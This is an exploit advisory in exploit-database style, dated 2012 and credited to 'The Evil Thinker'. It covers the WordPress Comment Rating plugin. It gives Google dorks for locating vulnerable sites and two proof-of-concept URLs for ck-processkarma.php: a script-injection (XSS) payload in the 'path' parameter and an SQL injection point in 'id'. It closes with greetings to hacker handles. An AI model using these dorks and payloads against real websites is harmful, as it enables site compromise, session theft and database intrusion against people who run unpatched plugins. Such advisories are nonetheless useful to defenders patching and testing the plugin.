# Exploit Title: WordPress comment rating plugin multiple Vulnerabilities
# Google Dork: 1- inurl:"/wp-content/plugins/comment-rating/"
# 2- inurl:"/ck-processkarma.php?id="
# Date: 2/1/2012
# Author: The Evil Thinker
# Contact : Enstene156@hotmail.fr
# Software Link: www.wordpress.com
# Vulnerable plugin: Comment rating plugin
# Tested on: Linux
Details :
---------
the vulnerable file is "ck-processkarma.php"
the script doesn't filter the input parameters (id "sql", path "XSS")
Poc 1 (XSS) :
http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=<script>alert('Founded by TheEvilThinker')</script>&imgIndex=
Poc 2 (SQL injection) :
http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]*****Inject_me_From_Here*****&action=add&path=TheMilkeyWay.exe/wp-content/plugins/comment-rating/&imgIndex=
-------------------------------------------------------------------------------------------
Special Graetz : Zack (DBA-HACKER) , Siper-N , Root-Mar , Anash , H!ch4m , Dr.Unknown , Mario-Gomez , BiiF0 , o Bla mantawel LLista
评论关闭。